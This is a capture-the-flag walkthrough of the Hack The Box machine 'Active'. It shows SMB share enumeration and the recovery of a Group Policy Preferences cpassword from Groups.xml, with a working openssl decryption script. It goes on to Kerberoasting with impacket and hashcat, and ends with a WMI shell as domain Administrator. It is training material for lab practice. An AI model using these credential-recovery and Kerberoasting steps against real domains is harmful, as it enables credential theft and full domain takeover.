Hack The Box: Active

Difficulty: Medium


Machine Creator: eks & mrb3n


Tools Used:
Task: To find User.txt and Root.txt


Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC

The scan gives us a lot to work with. Port 53 (Microsoft DNS), port 88 (Kerberos) and ports 389 and 3268 (LDAP and the Global Catalog) are all open, which is the signature of a domain controller, and the LDAP and Kerberos output names the domain active.htb.



SMB on port 445 is open as well, so let's see whether any of its shares can be accessed.

smbclient -L //

smbclient //

After some trial and error, I was able to access the Replication share, a domain share that holds a copy of the domain's group policy data.

Inside it is a Policies directory, which contains the group policy objects themselves. Within one of those policies there is a Groups.xml file, and this file can contain some vital information.

Group Policy

Groups.xml is written by Group Policy Preferences (GPP), a feature used on older versions of Windows to create or modify accounts and set their passwords through group policy. In this file we can see a policy that updates the user active.htb\SVC_TGS and changes its password. The cpassword attribute holds that password in encrypted form.


The vulnerability is not in the cipher but in the key: cpassword is AES-256 encrypted, but the key is the same in every domain and Microsoft published it in its own documentation (the MS14-025 update stopped new passwords from being written this way, yet it left existing Groups.xml files untouched). Anyone who can read the file can therefore recover the plaintext. Running the value through the tool gpp-decrypt gives the password GPPstillStandingStrong2k18.
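The decryption that gpp-decrypt performs, written out with openssl so the weakness is visible. This is an added example, not code from the original post or from the gpp-decrypt tool: the 32-byte AES key is the one Microsoft published, the zero IV and the UTF-16LE plaintext with PKCS7 padding are the documented cpassword layout, and the gpp_encrypt helper and the value it encrypts are constructed here only so the script can build and check its own test vector offline.

```bash
#!/bin/sh
# Added example: the cpassword scheme behind gpp-decrypt, done with openssl.
# Not code from the original post or from the gpp-decrypt tool.
# GPP_KEY is the fixed AES-256 key Microsoft published for Group Policy
# Preferences; because it never changes, the "encryption" is only encoding.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
ZERO_IV=00000000000000000000000000000000   # GPP uses an all-zero IV

# Encode a string as UTF-16LE, the plaintext layout GPP uses. Only ASCII
# input is handled: each byte is followed by a NUL. Avoids needing iconv.
to_utf16le() {
    s="$1"
    while [ -n "$s" ]; do
        rest="${s#?}"
        printf '%s\0' "${s%"$rest"}"
        s="$rest"
    done
}

# Recover the plaintext password from a cpassword attribute value.
gpp_decrypt() {
    cpass="$1"
    # GPP strips the trailing '=' from the base64; restore it before decoding.
    while [ $(( ${#cpass} % 4 )) -ne 0 ]; do
        cpass="${cpass}="
    done
    printf '%s' "$cpass" \
        | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
        | tr -d '\000'   # openssl removes the PKCS7 padding; drop the UTF-16LE NULs
}

# Inverse of gpp_decrypt. Used here only to build a test vector offline;
# on an engagement the cpassword comes straight out of Groups.xml.
gpp_encrypt() {
    to_utf16le "$1" \
        | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
        | base64 \
        | tr -d '\n='
}

# Constructed demonstration value (the password recovered on this box).
cpass=$(gpp_encrypt 'GPPstillStandingStrong2k18')
printf 'cpassword : %s\n' "$cpass"
printf 'decrypted : %s\n' "$(gpp_decrypt "$cpass")"
```

Feed any cpassword taken from a Groups.xml (or ScheduledTasks.xml, Services.xml and the other GPP files that carry the attribute) to gpp_decrypt and the plaintext comes back; no key material from the target is needed, which is the whole point of MS14-025.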


smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H

With user credentials we can run smbmap to see which shares the svc_tgs account can read or write.


ldapsearch -x -h -p 389 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2))(serviceprincipalname=*/*))" serviceprincipalname | grep -B 1 servicePrincipalName

With ldapsearch we can find any user accounts that have a Service Principal Name (SPN). The filter asks for user objects (objectCategory=person, objectClass=user) that are not disabled (the bit-wise matching rule 1.2.840.113556.1.4.803 on userAccountControl excludes accounts carrying the ACCOUNTDISABLE flag, value 2) and that have a servicePrincipalName set. Any such account can be Kerberoasted: any domain user can request a service ticket for that SPN, and the ticket is encrypted with the service account's password hash, so it can be cracked offline.


python active.htb/svc_tgs -dc-ip -request

The script from impacket requests a service ticket for each SPN found and prints the encrypted part of the ticket in a format hashcat understands. Here the SPN is attached to the Administrator account, so cracking the ticket gives us Administrator's password. Now we need to crack this hash.


hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt

I saved the hash from the previous step to a text file so it can be run through hashcat; mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC), which matches the $krb5tgs$23$ prefix impacket produces. In this instance I am using the Windows build so I can take advantage of my Nvidia 1060 graphics card; your command will vary depending on your setup. After a couple of seconds the hash is cracked to reveal the password "Ticketmaster1968".

python active.htb/administrator:Ticketmaster1968@

We now have credentials for Administrator, but this server does not have RDP enabled. The impacket directory contains a Python script that gives us a command shell over WMI, so we can authenticate as Administrator and run commands on the domain controller without RDP.